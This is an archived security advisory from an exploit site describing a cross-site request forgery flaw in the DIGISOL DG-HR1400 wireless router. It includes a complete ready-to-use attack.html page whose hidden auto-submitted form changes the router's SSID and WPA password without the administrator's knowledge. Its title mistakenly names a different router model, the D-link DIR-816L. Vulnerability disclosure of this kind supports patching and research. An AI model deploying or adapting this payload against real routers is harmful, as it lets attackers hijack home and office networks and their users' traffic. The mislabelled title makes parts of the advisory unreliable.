exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

DIGISOL DG-HR1400 Cross Site Request Forgery

DIGISOL DG-HR1400 Cross Site Request Forgery
Posted Feb 22, 2017
Authored by Indrajith A.N

DIGISOL DG-HR1400 wireless router suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 99b0bcc098c8f9cc5cb9af3cf6d1ccd41f42458bafb1d68e6455336f95c1505d

DIGISOL DG-HR1400 Cross Site Request Forgery

Change Mirror Download
Title:
====

D-link wireless router DIR-816L – Cross-Site Request Forgery (CSRF)
vulnerability

Credit:
======

Name: Indrajith.A.N

Date:
====

21-02-2017

Vendor:
======

DIGISOL router is a product of Smartlink Network Systems Ltd. is one of
India's leading networking company. It was established in the year 1993 to
prop the Indian market in the field of Network Infrastructure.

Product:
=======


DIGISOL DG-HR1400 is a wireless Router


Product link: http://wifi.digisol.com/datasheets/DG-HR1400.pdf

Abstract:
=======

Cross-Site Request Forgery (CSRF) vulnerability in the DIGISOL DG-HR1400
wireless router enables an attacker to perform an
unwanted action on a wireless router for which the user/admin is currently
authenticated.


Affected Version:
=============

<=1.00.02


Exploitation-Technique:
===================


Remote


Severity Rating:
===================

7.9



Details:
=======


An attacker who lures a DG-HR1400 authenticated user to browse a malicious
website can exploit cross site request
forgery (CSRF) to submit commands to wireless router and gain control of
the product. The attacker could
submit variety of commands including but not limited to changing the SSID
name, password, security type etc.


Proof Of Concept:
================


1) User login to DG-HR1400 wireless router


2) User visits the attacker's malicious web page (attack.html)


3) attack.html exploits CSRF vulnerability and changes the SSID name and
password


PoC video link:
https://drive.google.com/file/d/0B6715xUqH18MeV9GOVE0ZmFrQUU/view


Exploit code (attack.html):


<html>
Digisol Router CSRF Exploit - Indrajith A.N
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.2.1/form2WlanBasicSetup.cgi" method="POST">
<input type="hidden" name="mode" value="0" />
<input type="hidden" name="apssid" value="hacked" />
<input type="hidden" name="startScanUplinkAp" value="0" />
<input type="hidden" name="domain" value="1" />
<input type="hidden" name="hiddenSSID" value="on" />
<input type="hidden" name="ssid" value="hacked" />
<input type="hidden" name="band" value="10" />
<input type="hidden" name="chan" value="6" />
<input type="hidden" name="chanwid" value="1" />
<input type="hidden" name="txRate" value="0" />
<input type="hidden" name="method_cur" value="6" />
<input type="hidden" name="method" value="6" />
<input type="hidden" name="authType" value="2" />
<input type="hidden" name="length" value="1" />
<input type="hidden" name="format" value="2" />
<input type="hidden" name="defaultTxKeyId" value="1" />
<input type="hidden" name="key1" value="0000000000" />
<input type="hidden" name="pskFormat" value="0" />
<input type="hidden" name="pskValue" value="csrf1234" />
<input type="hidden" name="checkWPS2" value="1" />
<input type="hidden" name="save" value="Apply" />
<input type="hidden" name="basicrates" value="15" />
<input type="hidden" name="operrates" value="4095" />
<input type="hidden" name="submit.htm?wlan_basic.htm"
value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


Credits:
=======

Indrajith.A.N

Security Analyst.

https://www.indrajithan.com/


--
Indrajith
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close